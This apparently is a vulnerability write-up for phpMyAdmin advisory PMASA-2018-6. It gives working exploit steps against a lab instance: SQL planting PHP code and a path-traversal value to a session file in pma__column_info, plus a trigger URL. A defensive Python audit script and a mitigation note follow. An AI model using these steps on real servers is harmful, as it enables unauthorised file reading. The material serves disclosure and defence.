On December 07, 2018, phpMyAdmin released security bulletin PMASA-2018-6 to fix a local file reading vulnerability caused by the Transformation feature. The transformation feature of phpMyAdmin allows a specific display for some columns when selecting them from a table. For example, it can transform links in text format into clickable links when rendering them.
More about Transformations: Transformations - phpMyAdmin 5.0.0-dev documentation
VulnSpy's online phpMyAdmin 4.8.1 environment: https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1
VULNERABILITY DETAILS
PHPMyAdmin multiple vulnerabilities - Sec Team Blog
EXPLOIT
- Create a new database foo with a random bar table containing a baz column, with data containing PHP code in it (to fill the session with some PHP code):
CREATE DATABASE foo;
CREATE TABLE foo.bar ( baz VARCHAR(100) PRIMARY KEY );
INSERT INTO foo.bar SELECT '<?php phpinfo(); ?>';
- Visit http://pma.vsplate.me/chk_rel.php?fixall_pmadb=1&db=foo to create the phpMyAdmin system tables in your db
- Fill the transformation information with the path traversal in the pma__column_info table:
Replace sess_*** with your session ID (the phpMyAdmin cookie):
INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop',
'plop', 'plop', 'plop',
'../../../../../../../../tmp/sess_***','plop';
- Visit http://pma.vsplate.me/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 to trigger the vulnerability.
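For defenders, the following added example (not part of the original write-up and not phpMyAdmin's own code) audits rows exported from pma__column_info and flags transformation file names that resolve outside the plugin directory, which is the condition the steps above rely on. The plugin base directory, the function names and the sample rows are assumptions constructed for illustration.

```python
import posixpath

# Assumption: directory (relative to the phpMyAdmin root) that transformation
# plugin files are loaded from; the page does not state it.
PLUGIN_BASE = "libraries/classes/Plugins/Transformations"

# The two pma__column_info columns that hold a plugin file name.
FILE_COLUMNS = ("transformation", "input_transformation")


def escapes_base(value, base=PLUGIN_BASE):
    """Return True if base + value resolves outside base once normalised."""
    if not value:
        return False
    value = value.replace("\\", "/")
    if "\x00" in value or value.startswith("/"):
        return True
    resolved = posixpath.normpath(posixpath.join(base, value))
    return not resolved.startswith(base + "/")


def audit_column_info(rows):
    """Return (db, table, column, field, value) for every suspicious entry."""
    findings = []
    for row in rows:
        for field in FILE_COLUMNS:
            value = row.get(field, "")
            if escapes_base(value):
                findings.append((row["db_name"], row["table_name"],
                                 row["column_name"], field, value))
    return findings


# Constructed sample rows: one ordinary entry, one shaped like the INSERT above.
SAMPLE_ROWS = [
    {"db_name": "shop", "table_name": "items", "column_name": "url",
     "transformation": "Output/Text_Plain_Link.php", "input_transformation": ""},
    {"db_name": "foo", "table_name": "bar", "column_name": "baz",
     "transformation": "plop",
     "input_transformation": "../../../../../../../../tmp/sess_***"},
]

if __name__ == "__main__":
    for finding in audit_column_info(SAMPLE_ROWS):
        print("suspicious transformation entry:", finding)
```

The same containment check, applied before a configured file name is ever loaded, is the general mitigation for this class of bug: normalise the joined path and refuse anything that leaves the intended directory.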